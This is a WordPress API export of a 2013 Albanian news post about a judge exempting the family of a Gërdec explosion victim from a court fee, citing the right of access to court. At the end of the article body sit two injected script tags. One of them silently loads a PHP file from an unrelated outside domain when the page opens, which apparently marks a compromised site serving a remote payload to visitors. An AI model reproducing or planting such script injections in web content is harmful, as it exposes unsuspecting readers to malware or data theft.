{"id":391,"date":"2013-09-27T14:44:05","date_gmt":"2013-09-27T12:44:05","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=391"},"modified":"2013-09-27T22:59:37","modified_gmt":"2013-09-27T20:59:37","slug":"gjykata-jep-drejtesi","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=391","title":{"rendered":"Gjykata jep drejt\u00ebsi"},"content":{"rendered":"<p>N\u00eb nj\u00eb nga proceset civile q\u00eb shohin t\u00eb implikuar familjar\u00ebt e shp\u00ebrthimit t\u00eb G\u00ebrdecit, gjykat\u00ebsja Eneida Civici vendosi p\u00ebr p\u00ebrjashtuar nga parapagimi i taks\u00ebs gjygj\u00ebsore an\u00ebtar\u00ebt e njer\u00ebs nga familjet q\u00eb kanw humbur kryefamiljarin e tyre nga shp\u00ebrthimi fam\u00ebkeq i G\u00ebrdecit. Kat\u00ebr nga padit\u00ebsit jan\u00eb ende n\u00eb mosh\u00eb t\u00eb mitur dhe p\u00ebrvec humbjes s\u00eb babait t\u00eb tyre, ata brenda vitit p\u00ebrjetuan dhe vdekjen e t\u00eb jem\u00ebs, e cila duksh\u00ebm nuk e p\u00ebrballoi dot stresin e humbjes t\u00eb s\u00eb shoqit. Sikur mos mjaftonin kushtet tejet t\u00eb r\u00ebnda ekonomike vlera e task\u00ebs s\u00eb padis\u00eb ishte p\u00ebrf\u00ebrsisht 1.2 milion lek\u00ebve te reja. Gjykata arriti n\u00eb k\u00ebt\u00eb konkluzion pasi verifikoi se mund\u00ebsit\u00eb parapaguese t\u00eb familjar\u00ebve te viktim\u00ebs ishin shum\u00eb m\u00eb t\u00eb ulta sesa vlera e taks\u00ebs se padis\u00eb. K\u00ebt\u00eb vendimi gjykat\u00ebsja Civici e mb\u00ebshteti tek e drejta e aksesit n\u00eb gjykat\u00eb, KEDNJ neni 6, neni 42 i kushtetuet\u00ebs si dhe n\u00eb vendimin nr 7 dt 27.02.2013 te Gjykat\u00ebs Kushtetuese. Ky vendim i pari llojit t\u00eb vet, hap drit\u00ebn jeshile q\u00eb dhe gjykat\u00ebs t\u00eb tjer\u00eb ta p\u00ebrkrahin analiz\u00ebn e gjykat\u00ebses Civici p\u00ebr t\u00eb mos i mohuar t\u00eb drejt\u00ebn p\u00ebr t\u2019ju drejtuar gjykat\u00ebs, si ka ndodhu shpesh p\u00ebr qytetar\u00ebt q\u00eb nuk kan\u00eb mund\u00ebsi paguese.<script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>N\u00eb nj\u00eb nga proceset civile q\u00eb shohin t\u00eb implikuar familjar\u00ebt e shp\u00ebrthimit t\u00eb G\u00ebrdecit, gjykat\u00ebsja Eneida Civici vendosi p\u00ebr p\u00ebrjashtuar [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":392,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/391"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=391"}],"version-history":[{"count":3,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/391\/revisions"}],"predecessor-version":[{"id":395,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/391\/revisions\/395"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/392"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=391"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=391"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=391"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}